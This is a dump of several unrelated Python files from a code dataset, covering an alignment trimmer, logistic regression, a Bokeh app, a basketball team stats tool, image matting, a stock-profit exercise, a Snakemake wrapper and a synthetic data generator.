\"\"\"\n\nclass MSATrimmer:\n\n def __init__(self, msa_file, biomolecule=None,max_gap=None, refseq_file=None):\n \"\"\"\n Parameters\n ----------\n self : MSATrimmer\n An instance of MSATrimmer class\n msa_file : str\n Path to the FASTA formatted MSA file\n biomolecule : str\n Type of biomolecule (protein or RNA)\n \"\"\"\n self.__msa_file = msa_file\n self.__refseq_file = refseq_file\n self.__max_gap = 0.5 if max_gap is None else max_gap\n if self.__max_gap > 1.0 or self.__max_gap < 0.0:\n logger.error('\\n\\tThe value of max_gap should be between 0 and 1')\n raise MSATrimmerException\n if biomolecule is not None:\n self.__biomolecule = biomolecule.strip().upper()\n else:\n self.__biomolecule = biomolecule\n self.__alignment_data = list(AlignIO.read(self.__msa_file, 'fasta'))\n\n logger.info('\\n\\tMSA file: {0}'\n '\\n\\tReference sequence file: {1}'\n '\\n\\tbiomolecule: {2}'\n ''.format(self.__msa_file, self.__refseq_file,\n self.__biomolecule,\n )\n )\n return None\n\n\n @property\n def alignment_data(self):\n \"\"\"\n \"\"\"\n return self.__alignment_data\n\n\n def compute_msa_columns_gap_size(self):\n \"\"\"Computes the gap size of each column in MSA\n\n Parameters\n ----------\n self : MSATrimmer\n Instance of MSATrimmer class\n\n Returns\n -------\n msa_columns_gap_size : tuple\n A tuple of column gap sizes. 
The column gap size is computed as\n the fraction of gaps in a particular MSA column.\n\n \"\"\"\n logger.info('\\n\\tObtaining columns containing more than {}% of gaps'.format(\n self.__max_gap * 100)\n )\n seqs_len = len(self.__alignment_data[0].seq)\n num_seqs = len(self.__alignment_data)\n logger.info('\\n\\tTotal number of sequences read from MSA file:{}'\n '\\n\\tLength of the sequences:{}'.format(num_seqs, seqs_len)\n )\n msa_columns_gap_size = list()\n for i in range(seqs_len):\n num_gaps = 0\n for record in self.__alignment_data:\n state_i = record.seq[i]\n if state_i == '.' or state_i == '-': num_gaps += 1\n gap_fraction_i = float(num_gaps)/float(num_seqs)\n msa_columns_gap_size.append(gap_fraction_i)\n max_gap_size = max(msa_columns_gap_size)\n min_gap_size = min(msa_columns_gap_size)\n logger.info('\\n\\tMinimum and maximum gap percentages, respectively:'\n '{0:.2f}% and {1:.2f}%'.format(min_gap_size * 100, max_gap_size * 100)\n )\n return tuple(msa_columns_gap_size)\n\n\n def msa_columns_beyond_max_gap(self):\n \"\"\"Obtains the columns in the MSA that contain more than the given gap\n fraction threshold.\n\n Parameters\n ----------\n self : MSATrimmer\n An instance of MSATrimmer class\n\n Returns\n -------\n msa_columns_beyond_max_gap : tuple\n A tuple of MSA columns whose gap fraction is beyond the\n max_gap\n \"\"\"\n columns_gap_size = self.compute_msa_columns_gap_size()\n seqs_len = len(self.__alignment_data[0].seq)\n msa_columns_beyond_max_gap = [\n i for i in range(seqs_len) if columns_gap_size[i] > self.__max_gap\n ]\n return tuple(msa_columns_beyond_max_gap)\n\n\n def trim_by_gap_size(self):\n \"\"\"Returns a tuple of MSA columns whose gap fraction is beyond\n self.__max_gap.\n\n Parameters\n ----------\n self : MSATrimmer\n An instance of MSATrimmer class\n\n Returns\n -------\n columns_to_remove : tuple\n A tuple containing columns that are going to be trimmed. These\n are MSA columns that have a gap fraction beyond self.__max_gap.\n \"\"\"\n columns_to_remove = self.msa_columns_beyond_max_gap()\n return tuple(columns_to_remove)\n\n\n def trim_by_refseq(self, remove_all_gaps=False):\n \"\"\"Obtains columns in the MSA that contain more gaps than the gap threshold\n and do not involve residues in the best matching sequence to the reference.\n If remove_all_gaps is set True, all columns involving gaps in the matching\n sequence to the reference are removed.\n\n Parameters\n ----------\n self : MSATrimmer\n An instance of MSATrimmer\n remove_all_gaps : bool\n If set to True, all columns with gaps in the matching sequence\n with the reference are removed.\n\n Returns\n -------\n columns_to_remove : tuple\n A tuple of MSA column positions. 
These columns are going to\n be removed from the MSA.\n \"\"\"\n seqbackmapper = SequenceBackmapper(msa_file = self.__msa_file,\n refseq_file = self.__refseq_file,\n biomolecule = self.__biomolecule,\n )\n matching_seqs = seqbackmapper.find_matching_seqs_from_alignment()\n logger.info('\\n\\tRemoving gapped columns corresponding to best'\n ' matching sequence to the reference'\n )\n first_matching_seq = matching_seqs[0]\n logger.info('\\n\\tSequence in MSA that matches the reference'\n '\\n\\t{}'.format(first_matching_seq)\n )\n\n gap_symbols = ['-', '.']\n if not remove_all_gaps:\n candidate_columns_to_remove = self.msa_columns_beyond_max_gap()\n # find out MSA columns that does correspond to gaps w.r.t the sequence\n # in MSA that matches with the reference\n logger.info('\\n\\tNumber of columns with more than {0:.2f}% gaps:{1}'\n ''.format(self.__max_gap* 100, len(candidate_columns_to_remove))\n )\n columns_to_remove = [\n i for i in candidate_columns_to_remove if first_matching_seq[i] in gap_symbols\n ]\n logger.info('\\n\\tNumber of columns to remove: {}'.format(len(columns_to_remove)))\n else: # if remove all gaps\n logger.info('\\n\\tRemoving all columns corresponding to gaps in the matching sequence')\n seqs_len = len(self.__alignment_data[0].seq)\n columns_to_remove = [\n i for i in range(seqs_len) if first_matching_seq[i] in gap_symbols\n ]\n logger.info('\\n\\tNumber of columns to be removed from MSA:{}'.format(\n len(columns_to_remove))\n )\n\n return tuple(columns_to_remove)\n\n \n def get_msa_trimmed_by_refseq(self, remove_all_gaps=False):\n \"\"\"\n \"\"\"\n columns_to_remove = self.trim_by_refseq(remove_all_gaps=remove_all_gaps)\n trimmed_msa = list()\n for record in self.__alignment_data:\n seq, seqid = record.seq, record.id\n trimmed_seq = [seq[i] for i in range(len(seq)) if i not in columns_to_remove]\n id_seq_pair = seqid, ''.join(trimmed_seq) \n trimmed_msa.append(id_seq_pair)\n return trimmed_msa\n\n","sub_path":"pydca/msa_trimmer/msa_trimmer.py","file_name":"msa_trimmer.py","file_ext":"py","file_size_in_byte":7645,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"13519783","text":"#coding: utf-8\n\ndef mult(m,n) : \n\tdef loop (n, result):\n\t\tif n <= 0 : \n\t\t\treturn result\n\t\telse : \n\t\t\treturn loop(n-1, result + m)\n\n\treturn loop(n, 0)\n\n\nm = int(input(\"m?\"))\nn = int(input(\"n?\"))\nprint(mult(m,n))\n","sub_path":"Day5/2-1.py","file_name":"2-1.py","file_ext":"py","file_size_in_byte":211,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"601191159","text":"import numpy as np \r\nimport pandas as pd \r\nfrom matplotlib import pyplot as plt \r\nimport pathlib\r\ndata = pd.read_csv(str(pathlib.Path(__file__).parent.absolute()) + \"\\ex2data1.txt\")\r\nt = [0,0,0]\r\ndata[\"x0\"] = np.ones(len(data))\r\ndef plot():\r\n admitted = data[data[\"y\"]==1]\r\n not_admitted = data[data[\"y\"]==0]\r\n plt.scatter(admitted[\"x1\"],admitted[\"x2\"])\r\n plt.scatter(not_admitted[\"x1\"],not_admitted[\"x2\"])\r\n plt.legend(loc = \"upper right\",labels = [\"Admitted\",\"NotAdmitted\"])\r\n plt.show()\r\ndef g(z):\r\n return 1/(1+np.exp(-z))\r\ndef h(i):\r\n return g(t[0] + t[1] * data[\"x1\"][i] + t[2] * data[\"x2\"][i])\r\ndef j():\r\n s = 0\r\n for i in range(len(data)):\r\n s+= (data[\"y\"][i]*np.log(h(i)+0.0000001)) - (1-data[\"y\"][i])*np.log(1-h(i)+0.0000001)\r\n return 1/len(data)*s\r\ndef gradientdescent(t,alpha):\r\n temp = [0,0,0]\r\n s = 
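For context, a sketch of how the trimmer class above might be driven; the file paths are placeholders, not files from the original repository:

# Hypothetical driver for MSATrimmer; 'msa.fasta' and 'ref.fasta' are made-up paths.
trimmer = MSATrimmer('msa.fasta', biomolecule='protein', max_gap=0.5, refseq_file='ref.fasta')
gappy_columns = trimmer.trim_by_gap_size()           # columns above the gap-fraction threshold
trimmed_pairs = trimmer.get_msa_trimmed_by_refseq()  # list of (seq_id, trimmed_sequence) pairs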
[0,0,0]\r\n for j in range(len(t)):\r\n for i in range(len(data)):\r\n s[j]+= (h(i) - data[\"y\"][i])*data[\"x\"+str(j)][i]\r\n for j in range(len(t)):\r\n temp[j] = t[j] - alpha/len(data)*s[j]\r\n return temp\r\nepochs = 400\r\nfor i in range(epochs):\r\n t = gradientdescent(t,0.001)\r\ncorrect = 0\r\nfor i in range(len(data)):\r\n if h(i)>0.5:\r\n if data[\"y\"][i] == 1:\r\n correct+=1\r\n elif h(i)<=0.5:\r\n if data[\"y\"][i] == 0:\r\n correct +=1\r\nprint(correct/len(data)*100)\r\n","sub_path":"Logistic_Regression.py","file_name":"Logistic_Regression.py","file_ext":"py","file_size_in_byte":1382,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"489970649","text":"import os\nimport json\nfrom bokeh.server.server import Server\nfrom tornado.ioloop import IOLoop\nfrom dataspot.visualization.visual_builder import VisualBuilder\nfrom dataspot.visualization.visual_helper import VisualHelper\nfrom dataspot.scripts.script_grouper import ScriptGrouper\nfrom dataspot.relationships.relationships_director import RelationshipsDirector\nfrom dataspot.relationships.import_director import ImportDirector\nfrom dataspot.relationships.writer.text_file_writer import TextFileWriter\n\nroot = os.path.abspath(os.sep)\nparser_config_path = os.path.join(root, 'dataspot/parser_config.json')\n\nconfig_path = os.path.join(root, 'app/data/config/dataspot_config.json')\nconfig_present = os.path.isfile(config_path)\n\nresults_path = os.path.join(root, 'app/data/results/dataspot_results.json')\nresults_present = os.path.isfile(results_path)\n\nscripts_present = os.listdir(os.path.join(root, 'app/data/scripts'))\n\nexcel_path = os.path.join(root, 'app/data/excel')\nexcel_present = os.listdir(excel_path)\n\nmanual_relationships_path = os.path.join(root, 'app/data/manual/manual_relationships.json')\nmanual_relationships_present = os.path.isfile(results_path)\n\n\nif results_present:\n f = open(results_path)\n relationships = json.load(f)\n f.close()\nelse:\n if scripts_present:\n scripts_path = os.path.join(root, 'app/data/scripts')\n else:\n scripts_path = os.path.join(root, 'app/example/scripts')\n\n scripts = ScriptGrouper.group(scripts_path=scripts_path)\n relationships = RelationshipsDirector.build(scripts=scripts, parser_config_path=parser_config_path)\n\n if not scripts_present:\n print('Oeps, no scripts present. 
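The nested per-parameter loops in gradientdescent above can be collapsed into a single matrix expression. A NumPy sketch of the same batch update, on synthetic data standing in for ex2data1.txt:

import numpy as np

def sigmoid(z):
    return 1.0 / (1.0 + np.exp(-z))

rng = np.random.default_rng(1)
X = np.hstack([np.ones((100, 1)), rng.normal(size=(100, 2))])  # bias column + 2 features
y = (X[:, 1] + X[:, 2] > 0).astype(float)

theta = np.zeros(3)
alpha = 0.001
for _ in range(400):
    grad = X.T @ (sigmoid(X @ theta) - y) / len(y)  # same sum as the explicit loops above
    theta -= alpha * grad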
I will take the example scripts')\n f = open(os.path.join(root, 'app/example/manual/manual_relationships.json'))\n manual_relationships = json.load(f)\n f.close()\n relationships = {**relationships, **manual_relationships}\n\n excel_path_example = os.path.join(root, 'app/example/excel')\n\n import_director = ImportDirector(relationships=relationships)\n import_director.build(path=excel_path_example)\n relationships = import_director.get_relationships()\n\n else:\n if manual_relationships_present:\n print('I am reading the manual relationships')\n f = open(manual_relationships_path)\n manual_relationships = json.load(f)\n f.close()\n relationships = {**relationships, **manual_relationships}\n\n if excel_present:\n print('I am reading the excel files')\n import_director = ImportDirector(relationships=relationships)\n import_director.build(path=excel_path)\n relationships = import_director.get_relationships()\n\n results_path = os.path.join(root, 'app/data/results')\n relationships_path = TextFileWriter.write(results_path=results_path, data=relationships,\n title='dataspot_results', timestamp=False, extension='json')\n print(\"Here are the new relationships located from now on: \" + relationships_path)\n\nif config_present:\n f = open(config_path)\n config = json.load(f)\n f.close()\nelse:\n f = open(os.path.join(root, 'dataspot/dataspot_config.json'))\n config = json.load(f)\n f.close()\n\n\ndef modify_doc(doc):\n visualbuilder = VisualBuilder(config=config, relationships=relationships)\n\n # Setup the working document\n doc = VisualHelper.setup_doc(doc)\n\n # Setup the visualization\n visualbuilder.build()\n\n # Add the visualization to the working document\n doc.add_root(visualbuilder.get_visual())\n\n\ndef bk_worker():\n server = Server({'/bkapp': modify_doc}, io_loop=IOLoop(), allow_websocket_origin=[\"0.0.0.0:5000\"])\n server.start()\n server.io_loop.start()\n\n\nfrom threading import Thread\nThread(target=bk_worker).start()","sub_path":"dataspot-bokeh/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":3828,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"456703378","text":"\"\"\"\nPython Web Development Techdegree\nProject 2 - Basketball Team Stats Tool\n--------------------------------------\n\"\"\"\n\n\nfrom constants import PLAYERS, TEAMS\nimport copy\nimport os\nimport random\nfrom typing import Any, Dict, List, Tuple\n\n\nMENU_OPTIONS = ['Display Team Stats', 'Quit']\n\n\ndef clear_console() -> None:\n \"\"\"Clears the console\"\"\"\n os.system('cls' if os.name == 'nt' else 'clear')\n\n\ndef display_options(options: List) -> None:\n \"\"\"Iterate over a collection and prints out the index and value\"\"\"\n for count, option in enumerate(options):\n print(f'{count + 1}) {option}')\n\n\ndef display_menu(title: str, options: List) -> None:\n \"\"\"Displays a menu\"\"\"\n clear_console()\n print('BASKETBALL TEAM STATS TOOL\\n')\n print(f'---- {title} ----\\n')\n\n display_options(options)\n\n\ndef prompt_user(prompt_msg: str, num_options: int) -> int:\n \"\"\"Prompts the user for an option (int) between 1 and 'num_options'\n Returns the user response\n \"\"\"\n MIN_OPTION = 1\n MAX_OPTION = num_options\n\n while True:\n try:\n user_input = int(input(prompt_msg))\n\n if user_input < MIN_OPTION or user_input > MAX_OPTION:\n raise ValueError(f'Please only a option between {MIN_OPTION} and {MAX_OPTION}')\n except ValueError as err:\n print(f'Invald input: {err}')\n else:\n return user_input\n\n\ndef cleaned_data() -> 
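One caveat about the `bk_worker` thread above: on Tornado 5+ an IOLoop wraps an asyncio event loop, and worker threads do not get one automatically, so a variant along these lines is commonly needed (a sketch, not the original code):

import asyncio
from threading import Thread
from bokeh.server.server import Server

def bk_worker_safe():
    # Worker threads have no asyncio loop by default; create one before starting the server.
    asyncio.set_event_loop(asyncio.new_event_loop())
    server = Server({'/bkapp': modify_doc}, allow_websocket_origin=['0.0.0.0:5000'])
    server.start()
    server.io_loop.start()

Thread(target=bk_worker_safe, daemon=True).start()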
List:\n \"\"\"Cleans the PLAYERS data\n Converts the height into an integer\n Converts experience into a boolean (True/False)\n Converts guardians into a list of names\n Returns a set containing the cleaned PLAYERS data\n \"\"\"\n players: List[Dict[str, Any]] = copy.deepcopy(PLAYERS)\n\n for player in players:\n try:\n player[\"height\"] = int(player[\"height\"][:2])\n except ValueError as err:\n print(f'Error: {err}')\n else:\n if player[\"experience\"] == \"YES\":\n player[\"experience\"] = True\n else:\n player[\"experience\"] = False\n\n player[\"guardians\"] = player[\"guardians\"].split(' and ')\n\n return players\n\n\ndef get_avg_height(team: List) -> float:\n \"\"\"Calculates the average height of a team\"\"\"\n return sum([player[\"height\"] for player in team]) / len(team)\n\n\ndef extract_players(players: List, experienced: bool) -> List:\n \"\"\"Extracts players depending on their experience\n Returns the extracted players\n \"\"\"\n return [player for player in players if player[\"experience\"] == experienced]\n\n\ndef create_team(players: List) -> Tuple[List, List]:\n \"\"\"Creates a balanced team with equal numbers of experiencd and inexperienced players\n Players added to the team is randomly picked\n Returns the created team and the remaining players\n \"\"\"\n exp_players = extract_players(players, True)\n inexp_players = extract_players(players, False)\n\n # selects 6 players randomly\n # 3 experienced players and 3 inexperienced players\n team = random.sample(exp_players, k=3) + random.sample(inexp_players, k=3)\n\n # removes the picked players from the list of available players\n players = [player for player in players if player not in team]\n\n return (team, players)\n\n\ndef generate_teams() -> Tuple[List, List, List]:\n \"\"\"Generates the teams\"\"\"\n players = cleaned_data()\n\n panthers, players = create_team(players)\n bandits, players = create_team(players)\n warriors, players = create_team(players)\n\n return (panthers, bandits, warriors)\n\n\ndef display_team_stats(team: List) -> None:\n \"\"\"Display the stats of a team\"\"\"\n exp_players = [player for player in team if player[\"experience\"] == True]\n num_exp_players = len(exp_players)\n \n print(f'Total players: {len(team)}')\n print(f'Average height: {get_avg_height(team)}')\n print(f'Number of experienced players: {num_exp_players}')\n print(f'Number of inexperienced players: {len(team) - num_exp_players}')\n\n\ndef display_names(title: str, names_list: List) -> None:\n \"\"\"Display names in a list\"\"\"\n print(f'\\n{title}:')\n print(f'\\t{\", \".join(names_list)}')\n\n\ndef display_team(team_name: str, team: List) -> None:\n \"\"\"Display a team\"\"\"\n players = [player[\"name\"] for player in team]\n guardians = [guardian for player in team for guardian in player[\"guardians\"]]\n\n clear_console()\n print(f'TEAM: {team_name}')\n print('----------------')\n display_team_stats(team)\n display_names('Players on team', players)\n display_names('Guardians', guardians)\n input('\\nPress ENTER to continue...')\n\n\ndef start() -> None:\n \"\"\"Main function that runs the program\"\"\"\n still_running = True\n teams = generate_teams()\n\n while still_running:\n display_menu('MENU', MENU_OPTIONS)\n user_input = prompt_user('\\nEnter option: ', len(MENU_OPTIONS))\n\n if user_input == 2:\n still_running = False\n elif user_input == 1:\n checking_teams = True\n\n while checking_teams:\n team_menu = TEAMS + ['Main menu']\n display_menu('TEAMS', team_menu)\n\n user_input = prompt_user('\\nEnter team: ', 
len(team_menu))\n\n if user_input == 4:\n checking_teams = False\n else:\n idx = user_input - 1\n display_team(TEAMS[idx], teams[idx])\n\n\nif __name__ == '__main__':\n start()\n\n","sub_path":"src/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":5405,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"35178994","text":"from . import loadf\nfrom .interactive import console\nfrom .parser import StekkSyntaxError, parse\nfrom .vm import VM\nimport sys\n\nif len(sys.argv) == 1:\n console()\nelif len(sys.argv) > 1:\n filenames = sys.argv[1:]\n vm = VM([])\n for filename in filenames:\n try:\n statements = loadf(filename).statements\n vm.statements.extend(statements)\n except FileNotFoundError:\n print(\"File not found:\", filename)\n exit(1)\n except StekkSyntaxError as e:\n print(e.error)\n exit(2)\n vm.run()\n console(vm)","sub_path":"stekk/__main__.py","file_name":"__main__.py","file_ext":"py","file_size_in_byte":589,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"632788203","text":"import cv2\r\nfrom PIL import Image\r\nimport numpy as np\r\n\r\n'''\r\nCutting an object out of an image with a mask in Python\r\nhttps://www.cxyzjd.com/article/qq_29391809/106036745\r\nTakes the original image and a mask image, and outputs an image with a transparent background\r\n'''\r\n\r\n\r\nclass UnsupportedFormat(Exception):\r\n def __init__(self, input_type):\r\n self.t = input_type\r\n\r\n def __str__(self):\r\n return \"Unsupported conversion mode '{}'; please use an image path (path), PIL.Image (pil) or OpenCV (cv2)\".format(self.t)\r\n\r\n\r\nclass MatteMatting():\r\n def __init__(self, original_graph, mask_graph, input_type='path'):\r\n \"\"\"\r\n Constructor: converts the input image into a transparent image using the mask\r\n :param original_graph: input image as a path, PIL format or CV2 format\r\n :param mask_graph: mask image as a path, PIL format or CV2 format\r\n :param input_type: input type; path: image path, pil: PIL type, cv2: CV2 type\r\n \"\"\"\r\n if input_type == 'path':\r\n self.img1 = cv2.imread(original_graph)\r\n self.img2 = cv2.imread(mask_graph)\r\n elif input_type == 'pil':\r\n self.img1 = self.__image_to_opencv(original_graph)\r\n self.img2 = self.__image_to_opencv(mask_graph)\r\n elif input_type == 'cv2':\r\n self.img1 = original_graph\r\n self.img2 = mask_graph\r\n else:\r\n raise UnsupportedFormat(input_type)\r\n\r\n @staticmethod\r\n def __transparent_back(img):\r\n \"\"\"\r\n :param img: input image\r\n :return: the transparent image after replacing white\r\n \"\"\"\r\n img = img.convert('RGBA')\r\n L, H = img.size\r\n color_0 = (255, 255, 255, 255) # the color to replace\r\n for h in range(H):\r\n for l in range(L):\r\n dot = (l, h)\r\n color_1 = img.getpixel(dot)\r\n if color_1 == color_0:\r\n color_1 = color_1[:-1] + (0,)\r\n img.putpixel(dot, color_1)\r\n return img\r\n\r\n def save_image(self, path, mask_flip=False):\r\n \"\"\"\r\n Save the transparent image\r\n :param path: save location\r\n :param mask_flip: mask inversion; flips the black and white of the mask; True to flip, False to leave it unchanged\r\n \"\"\"\r\n if mask_flip:\r\n img2 = cv2.bitwise_not(self.img2) # invert black and white\r\n else:\r\n img2 = self.img2 # avoid a NameError when mask_flip is False\r\n image = cv2.add(self.img1, img2)\r\n image = Image.fromarray(cv2.cvtColor(image, cv2.COLOR_BGR2RGB)) # convert OpenCV to PIL.Image format\r\n img = self.__transparent_back(image)\r\n img.save(path)\r\n\r\n @staticmethod\r\n def __image_to_opencv(image):\r\n \"\"\"\r\n Convert PIL.Image to OpenCV format\r\n \"\"\"\r\n img = cv2.cvtColor(np.asarray(image), cv2.COLOR_RGB2BGR)\r\n return img\r\n \r\nif __name__ == '__main__':\r\n \r\n mm = MatteMatting(\"2.png\", \"mask.jpg\")\r\n mm.save_image(\"output.png\", mask_flip=True) # 
mask_flip means mask inversion, i.e. the white parts become black and the black parts become white","sub_path":"get_transparet_background_image.py","file_name":"get_transparet_background_image.py","file_ext":"py","file_size_in_byte":2958,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"180124809","text":"# CompetitiveProgramming\n\ndef get_max_profit(stock_prices):\n\n # Calculate the max profit\n\tif len(stock_prices) >= 2:\n\t\tresult = -1000000\n\t\tfor x in range(0,len(stock_prices)-1):\n\t\t\tfor y in range(x+1,len(stock_prices)):\n\t\t\t\tprofit = stock_prices[y] - stock_prices[x]\n\t\t\t\tif profit > result:\n\t\t\t\t\tresult = profit\n\t\treturn result\n\tif len(stock_prices) < 2:\n\t\traise Exception (\"invalid input\")\n\n\n\n# Tests\n\nimport unittest\n\nclass Test(unittest.TestCase):\n\n def test_price_goes_up_then_down(self):\n actual = get_max_profit([1, 5, 3, 2])\n expected = 4\n self.assertEqual(actual, expected)\n\n def test_price_goes_down_then_up(self):\n actual = get_max_profit([7, 2, 8, 9])\n expected = 7\n self.assertEqual(actual, expected)\n\n def test_price_goes_up_all_day(self):\n actual = get_max_profit([1, 6, 7, 9])\n expected = 8\n self.assertEqual(actual, expected)\n\n def test_price_goes_down_all_day(self):\n actual = get_max_profit([9, 7, 4, 1])\n expected = -2\n self.assertEqual(actual, expected)\n\n def test_price_stays_the_same_all_day(self):\n actual = get_max_profit([1, 1, 1, 1])\n expected = 0\n self.assertEqual(actual, expected)\n\n def test_one_price_raises_error(self):\n with self.assertRaises(Exception):\n get_max_profit([1])\n\n def test_empty_list_raises_error(self):\n with self.assertRaises(Exception):\n get_max_profit([])\n\nunittest.main(verbosity=2)\n","sub_path":"week-1/day-1/appleStocks.py","file_name":"appleStocks.py","file_ext":"py","file_size_in_byte":1489,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"116586731","text":"\"\"\"Snakemake wrapper for vembrane\"\"\"\n\n__author__ = \"Christopher Schröder\"\n__copyright__ = \"Copyright 2020, Christopher Schröder\"\n__email__ = \"christopher.schroeder@tu-dortmund.de\"\n__license__ = \"MIT\"\n\nfrom snakemake.shell import shell\n\nlog = snakemake.log_fmt_shell(stdout=False, stderr=True)\n\nextra = snakemake.params.get(\"extra\", \"\")\n\nshell(\n \"vembrane\" # Tool and its subcommand\n \" {extra}\" # Extra parameters\n ' \"{snakemake.params.expression}\"'\n \" {snakemake.input.vcf}\" # Path to input vcf file\n \" > {snakemake.output.vcf}\" # Path to output vcf file\n \" {log}\" # Logging behaviour\n)\n","sub_path":"bio/vembrane/wrapper.py","file_name":"wrapper.py","file_ext":"py","file_size_in_byte":612,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"458331106","text":"#coding=utf-8\n#Head_First_Python chapter 1 - adding a third argument to the function\n#Some people don't like using TAB for indentation, so we add a third keyword argument, indent\ndef print_lol(the_list,indent=False,level=0): #add a parameter named indent, defaulting to False\n for each_item in the_list:\n if isinstance(each_item,list):\n print_lol(each_item,indent,level+1) #!!!as in 1.6, pass the newly added argument values along in the recursive call\n else:\n if indent: #check whether indent is True or False, which depends entirely on the argument passed by the caller\n #print_lol(movies,0): 0 stands for False, in which case the block below is not executed\n #print_lol(movies,1~n): any value above 0 counts as True, and in that case the block below runs\n for tab_stop in range(level):\n print ('\\t', end='')\n print (each_item)\n \nmovies = [\"The hold Graill\", 1975 ,\"Terry Jones & Terry Gilliam\", 91,\\\n [\"Graham Chapman\",[\"Micheal Palin\", \"John Cleese\",\"Terry Gilliam\",\\\n \"Eric Idie\", \"Terry 
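The double loop in get_max_profit above is O(n^2). The classic single-pass alternative tracks the running minimum instead; a sketch (not the original implementation) that keeps the same at-least-two-prices contract:

def get_max_profit_linear(stock_prices):
    if len(stock_prices) < 2:
        raise Exception('invalid input')
    min_price = stock_prices[0]
    max_profit = stock_prices[1] - stock_prices[0]
    for price in stock_prices[1:]:
        max_profit = max(max_profit, price - min_price)  # best sale ending today
        min_price = min(min_price, price)                # cheapest buy so far
    return max_profit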
Jones\"]]]\n\nprint_lol(movies,1)","sub_path":"1.7.py","file_name":"1.7.py","file_ext":"py","file_size_in_byte":1155,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"603564367","text":"import re\nimport requests\n\nroot = 'https://avio.pw/cn/'\nkeywords = 'f'\nurl = root + keywords\nr = requests.get(url)\nr.raise_for_status()\nr.encoding = r.apparent_encoding\n#print(r.text)\npattern=re.compile(r'https://jp.netcdn.space/digital/video/.*?jpg',re.S)\na=re.findall(pattern,r.text)\nprint(a)","sub_path":"5.24.py","file_name":"5.24.py","file_ext":"py","file_size_in_byte":294,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"411444130","text":"# Written by: Akshay Gangal\n# Tested by: Akshay Gangal\n\nimport numpy as np\nimport pandas as pd\nimport math\nimport random\nimport Common\nfrom scipy.stats import truncnorm\n\n## EntrySet - Class for combining entries from multiple datasets and minimzing errors added during generation \n#\nclass EntrySet:\n ## The constructor.\n # @param self The object pointer\n def __init__(self):\n H = Common.Helper()\n self.NormDistribution = np.zeros((len(H.GetZoneMap()),len(H.GetCusineMap()),10))\n self.Cusine_val = [0] * len(H.GetCusineMap())\n self.Current_subset = 0\n\n\n ## Validate rounding correction result.\n # @param self The object pointer\n # arr1 Array to validate the sum of\n # total_arr Expected value array\n def ValidateCorrection(self, arr1, total_arr):\n for row in range(0,len(arr1)):\n assert (sum(arr1[row]) == total_arr[row]),\"Rounding correction failed!!!\"\n\n\n # Calculate normalized weights for each cusine category\n # and get the scaled number of entries of each type\n def GenerateCusineDistribution(self):\n H = Common.Helper()\n num_entries = H.GetNumSubsetEntries()\n for val in range(0, len(H.GetCusineMap())):\n self.Cusine_val[val] = math.floor(float(num_entries)/len(H.GetCusineMap()))\n\n # Correct the error generated due to rounding\n H.RoundingCorrection(self.Cusine_val,num_entries,len(self.Cusine_val))\n\n\n ## Generate Truncated Normal distribution of values for input Zone type\n # @param self The object pointer\n # ZoneEntry Table of input values to generate normal distribution on\n # Zone_type Type of Zone used for normalization\n def GenerateTruncatedNormal(self,ZoneEntry):\n H = Common.Helper()\n sd = 5\n for Zone in range(0,len(ZoneEntry[0])):\n for cusine in range(0,len(ZoneEntry)):\n mean_old = ZoneEntry[cusine][Zone]\n low = mean_old - sd\n high = mean_old + sd\n X = truncnorm((low - mean_old) / sd, (high - mean_old) / sd, loc=mean_old, scale=sd)\n self.NormDistribution[Zone][cusine] = np.round(X.rvs(10),2)\n\n ## Get input data for Zone distribution vs Cusine type from csv file\n # @param self The object pointer\n def GetEntrySet(self):\n H = Common.Helper()\n\n ## @var df - Pandas Data frame to get Zone entries from csv file\n #\n df = pd.read_csv('Food_Location.csv')\n\n num_rows_zone = df.shape[0]\n num_columns_zone = df.shape[1]\n\n ## @var ZoneEntry - numpy array: Food category vs Zone list\n #\n ZoneEntry = np.zeros((num_rows_zone, num_columns_zone - 1))\n for row in range(0,num_rows_zone):\n for column in range(1,num_columns_zone):\n ZoneEntry[row][column-1] = int(df.iloc[row][column] * 100)\n\n return ZoneEntry\n\n ## Read and compute Zone entry count Tables\n # @param self The object pointer\n def CreateNormalizedSet(self,ZoneEntry,entryset):\n H = Common.Helper()\n num_entries = H.GetNumSubsetEntries()\n 
DistInc = H.GetDistIncrease()\n DistDec = H.GetDistDecrease()\n DistGaus = H.GetDistGaussian()\n\n column_list = []\n # Increase\n for key,val in DistInc.items():\n row = H.GetKeyByValue(H.GetCusineMap(),(H.GetKeyByValue(H.GetCusineType(),key,False)),True)\n column = H.GetKeyByValue(H.GetZoneMap(),val,True)\n if column not in column_list:\n column_list.append(column)\n if entryset == 0:\n ZoneEntry[row][column] = round(min(self.NormDistribution[column][row]),2)\n elif entryset == 1:\n ZoneEntry[row][column] = round(sorted(self.NormDistribution[column][row])[1],2)\n elif entryset == 3:\n ZoneEntry[row][column] = round(sorted(set(self.NormDistribution[column][row]))[-2],2)\n elif entryset == 4:\n ZoneEntry[row][column] = round(max(self.NormDistribution[column][row]),2)\n elif entryset != 2:\n assert(0),\"Invalid entry set\"\n\n # Gaussian\n for key,val in DistGaus.items():\n row = H.GetKeyByValue(H.GetCusineMap(),(H.GetKeyByValue(H.GetCusineType(),key,False)),True)\n column = H.GetKeyByValue(H.GetZoneMap(),val,True)\n if column not in column_list:\n column_list.append(column)\n if entryset == 0 or entryset == 4:\n ZoneEntry[row][column] = round(min(self.NormDistribution[column][row]),2)\n elif entryset == 1 or entryset == 3:\n ZoneEntry[row][column] = 